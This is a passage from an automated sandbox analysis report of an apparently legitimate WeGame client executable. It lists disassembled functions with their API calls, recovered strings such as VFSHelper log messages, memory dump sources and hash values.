                                                                • String ID: fileinfo.hash$login_pic\
                                                                • API String ID: 829375453-3670449923
                                                                • Opcode ID: 2c6d64186fa0a8a185fecd11ee262b9d63103ea1dcda6ec578d9a6b9cf944185
                                                                • Instruction ID: f02982119b7ff2e6ea8ad109479c1530364de259ebaa37c14b237c390a41922c
                                                                • Opcode Fuzzy Hash: 2c6d64186fa0a8a185fecd11ee262b9d63103ea1dcda6ec578d9a6b9cf944185
                                                                • Instruction Fuzzy Hash: EE417231D01248DFCF14EBA5C956BDDBB74AF18304F5450AEE049A7282EB385B49CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040A070 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A0A7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040A193
                                                                  • Part of subcall function 00409BA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,85A35C35), ref: 00409DBC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A16E
                                                                  • Part of subcall function 004115A0: _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,85A35C35,?,?), ref: 004115F1
                                                                  • Part of subcall function 004115A0: SetFileAttributesW.KERNEL32(?,00000080), ref: 0041160E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$AttributesEnterFileLeave_waccess
                                                                • String ID: VFSHelper::EndLoadFileSet()$VFSHelper::EndLoadFileSet() $fileSetID
                                                                • API String ID: 2819506187-656408057
                                                                • Opcode ID: 8549c9656e4eb64d655d0b39d277df238e19626b317c59bc1663ee307650161e
                                                                • Instruction ID: 4a3a8ee7209b14212b81e4ff5782c8010debcbdd0a59d0ad95ed4eb7571dfb29
                                                                • Opcode Fuzzy Hash: 8549c9656e4eb64d655d0b39d277df238e19626b317c59bc1663ee307650161e
                                                                • Instruction Fuzzy Hash: FC311671A002099BCB04DF65D885BEEBBB5EF45324F20022BE511A73C0DB3C5998C79A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402D90 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 00402DC7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402DE7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402E02
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00402E3E
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402E58
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                Strings
                                                                • VFSHelper::Uninit() FileLoader, xrefs: 00402E1F
                                                                • VFSHelper::Uninit() VFSHelper, xrefs: 00402DCF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermemset$DebugOutputString
                                                                • String ID: VFSHelper::Uninit() FileLoader$VFSHelper::Uninit() VFSHelper
                                                                • API String ID: 2503103738-2689658810
                                                                • Opcode ID: e4280ca8eae778cd1af3a8105f35694687289ec8bc813dca21ad15d487d06bd6
                                                                • Instruction ID: 7d46fe32b367f48656aae9e18df92f9e7d53d3a528c4535c6d05a22ab6bb1db3
                                                                • Opcode Fuzzy Hash: e4280ca8eae778cd1af3a8105f35694687289ec8bc813dca21ad15d487d06bd6
                                                                • Instruction Fuzzy Hash: 78213732A04184AFDB00DF69EC04BCEBBB8EF56319F00017AE40853381DBB9264987E9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402CF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00402CFF
                                                                • CreateThread.KERNEL32 ref: 00402D3D
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402D55
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402D80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leavememset$CreateDebugEnterOutputStringThread
                                                                • String ID: VFSHelper::Init() FileLoader$VFSHelper::Init() VFSHelper
                                                                • API String ID: 3707779055-153008969
                                                                • Opcode ID: dbac0a42dc97a11a5782e51cfd8ac956fa8ad244c4ed6206cadce99b849e9c20
                                                                • Instruction ID: b41cabd93e693adb520f8ce40c8524c4ae8f4b4289053b851d34fba29ff81475
                                                                • Opcode Fuzzy Hash: dbac0a42dc97a11a5782e51cfd8ac956fa8ad244c4ed6206cadce99b849e9c20
                                                                • Instruction Fuzzy Hash: 2711E971641241BAE7009F25EC48FC67B6CEF92318F041037F50497281C7B9999AC7ED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00456BCC Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456BD3
                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000014,00000000,00000000,00000000,?,?,?,?,?,0000001C), ref: 00456BDE
                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,0000001C), ref: 00456BF6
                                                                • std::locale::_Getfacet.LIBCPMT ref: 00456C00
                                                                  • Part of subcall function 0044C734: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,00000000,?,004430B7,00000000), ref: 0044C759
                                                                • std::_Facet_Register.LIBCPMT ref: 00456C31
                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,0000001C), ref: 00456C51
                                                                • _CxxThrowException.VCRUNTIME140(?,004966C4,00000000,?,?,?,?,?,0000001C), ref: 00456C70
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2295579510-0
                                                                • Opcode ID: 7a0db9d83ec0b7c1fc0417cd69087db8e87b9df2bb2db8d5aa62a49486cd8507
                                                                • Instruction ID: da5ea7f2637aebbca816675167e180b4f4f980d0c216fc73710368e3723905e5
                                                                • Opcode Fuzzy Hash: 7a0db9d83ec0b7c1fc0417cd69087db8e87b9df2bb2db8d5aa62a49486cd8507
                                                                • Instruction Fuzzy Hash: DC11BE35800214DFCF15EFA4C8448AEBB74FF04315B14055EE815A33A2DB389A45CB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00414F60 Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,00000000,?,00000000,00000000), ref: 00415018
                                                                • memset.VCRUNTIME140(00000000,00000000,00001000,85A35C35,?,00000000,00000000), ref: 004150BE
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000), ref: 004150CD
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000), ref: 004150E3
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004150EF
                                                                • memmove.VCRUNTIME140(00000000,85A35C35,?,85A35C35,?,00000000,00000000), ref: 004150AA
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _errnomemset$_invalid_parameter_noinfomallocmemmove
                                                                • String ID:
                                                                • API String ID: 2221371199-0
                                                                • Opcode ID: 8f8bedea6191fb9d9228ab8b439284af1a0c2d2f50ed02c8933a3bd59319ff3c
                                                                • Instruction ID: b2885f98c78a51a8d02c9e78d7e384a1aceb273db22ab245a402808f979f4e27
                                                                • Opcode Fuzzy Hash: 8f8bedea6191fb9d9228ab8b439284af1a0c2d2f50ed02c8933a3bd59319ff3c
                                                                • Instruction Fuzzy Hash: B0B114B4A00606DFDB14CF19C880B9ABBE1FF89354F24C16EE9598B351D779E981CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040A6D0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 422fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,85A35C35,?,?), ref: 0040A8CB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,-00000010,00000000,?,?,?), ref: 0040A8E8
                                                                • CloseHandle.KERNEL32(?), ref: 0040A965
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0040AC78
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo_noreturnfree
                                                                • String ID: DATA
                                                                • API String ID: 3691831780-2607161047
                                                                • Opcode ID: d521d9954a72f9a34c52c885197fb585e1eaa15de1ef91ab2fce970a6204007f
                                                                • Instruction ID: d8509d03ff4a2c80bc74afda0eea25527ea6faf85f33728b85c951f87899b873
                                                                • Opcode Fuzzy Hash: d521d9954a72f9a34c52c885197fb585e1eaa15de1ef91ab2fce970a6204007f
                                                                • Instruction Fuzzy Hash: 4302E171D042588FDB20CF28C944BAEBBB1BF45304F1981AAD449BB2D2DB38AD95CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00428560 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00428780: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00000000,0042304C), ref: 004287C0
                                                                  • Part of subcall function 00428780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00000000,0042304C), ref: 004287E9
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(000000D0,?,00000000,?,?,?,?,00422F4E), ref: 004285BD
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00004000,?,?,?,?,?,?,?,00422F4E), ref: 004285CD
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00422F4E), ref: 00428603
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00422F4E), ref: 0042875F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: free$malloc
                                                                • String ID: 1.2.5$N/B
                                                                • API String ID: 2190258309-2277431266
                                                                • Opcode ID: 3f57712760d94e11327135a48cbf9edde4548a6039fa25a6f0739e8d63c455e8
                                                                • Instruction ID: 61a3aa9aad1a52163fdec6738f066cb7dfab65519c0a573732084c654ad5121d
                                                                • Opcode Fuzzy Hash: 3f57712760d94e11327135a48cbf9edde4548a6039fa25a6f0739e8d63c455e8
                                                                • Instruction Fuzzy Hash: 7F5137B1A01B159BD320CF69E88079AF7E0FF48318F504A2ED99E87741DB75B498CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00450422 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,?), ref: 0045043A
                                                                • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 00450453
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045048B
                                                                • memmove.VCRUNTIME140(?,00000000,?), ref: 00450498
                                                                • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 004504AE
                                                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 004504DC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@freadmemmove
                                                                • String ID:
                                                                • API String ID: 418166761-0
                                                                • Opcode ID: 6eafa354046522e6660deda5cb973dbfd154baf2a9e0b5838e6dce209d1402a0
                                                                • Instruction ID: afa618f58e3e94be8eb50a2a60ba4f114ae13452b9576e258ae28143417118d8
                                                                • Opcode Fuzzy Hash: 6eafa354046522e6660deda5cb973dbfd154baf2a9e0b5838e6dce209d1402a0
                                                                • Instruction Fuzzy Hash: BD21BF3AA00209EBCF249F69CD4469E7BB5FF45342F04842AFE0897252D738DD59CB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004504FB Relevance: 9.1, APIs: 6, Instructions: 78fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 00450513
                                                                • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 0045052C
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450560
                                                                • memmove.VCRUNTIME140(00000000,?,?), ref: 0045056D
                                                                • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 00450583
                                                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 004505A3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwritememmove
                                                                • String ID:
                                                                • API String ID: 4148317875-0
                                                                • Opcode ID: 9ecbb36e08bbaade886083dcdc8416934afdd2f447d2f65a840fdd0312aaff6a
                                                                • Instruction ID: 5dff355223c14c524a2034df7665b917349f8d921c974d8eeee79c885f2b65c5
                                                                • Opcode Fuzzy Hash: 9ecbb36e08bbaade886083dcdc8416934afdd2f447d2f65a840fdd0312aaff6a
                                                                • Instruction Fuzzy Hash: C7218D7AA1021CBBCF14CF6CC844A8E7BB5AF44712F04452AFC19D3212E779D9588F88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00454E7C Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C174,unexpected end of data,?,?,?,?,?,?,?,?), ref: 00454F13
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID: expected ' or "$expected =$expected >$expected attribute name$unexpected end of data
                                                                • API String ID: 432778473-2454120470
                                                                • Opcode ID: dd476e555283d591a2dfd6daaf052d37d32cfe7c3a0fd1b43c276b0caf7a3054
                                                                • Instruction ID: ec9a66d078045d9903f77caf713da43aad7e90607ce14e2b7ad29992db215a54
                                                                • Opcode Fuzzy Hash: dd476e555283d591a2dfd6daaf052d37d32cfe7c3a0fd1b43c276b0caf7a3054
                                                                • Instruction Fuzzy Hash: A711E6B1104104AECB14AF65D843CAE77A9EF95319B24080FFC815B283DB6C9989CB6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040AD10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040AD5F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040ADBF
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?,?,?,?,00471F38,000000FF), ref: 0040AE02
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00471F38,000000FF), ref: 0040AE30
                                                                Strings
                                                                • VFSHelper::UpdateKey() , xrefs: 0040AE18
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$EnterLeave
                                                                • String ID: VFSHelper::UpdateKey()
                                                                • API String ID: 4256121347-2141629103
                                                                • Opcode ID: 87e162c1bf225c4a4558edd9a76979cbe765f74ce119fed3ffa3e49b6d992a4d
                                                                • Instruction ID: 2efd3ce37363fb834d004f871117e12d701acc8a980839d67c9130e104af5cd0
                                                                • Opcode Fuzzy Hash: 87e162c1bf225c4a4558edd9a76979cbe765f74ce119fed3ffa3e49b6d992a4d
                                                                • Instruction Fuzzy Hash: 7E31E8725102009FD714DF15ED89BAFB7A5EF85315F00062EF406D7B90D77CA9448759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462294 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046229B
                                                                  • Part of subcall function 00455EDC: __EH_prolog3.LIBCMT ref: 00455EE3
                                                                  • Part of subcall function 00455EDC: ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000018,00000000,void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,0000033C), ref: 00455EE8
                                                                  • Part of subcall function 00455EDC: ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(0000033C,?,00000018,00000000,void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,0000033C), ref: 00455EF6
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 004622E8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045F764,?,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,?,?,?), ref: 00462309
                                                                Strings
                                                                • [main]query g_ComNetBar failed, xrefs: 00462341
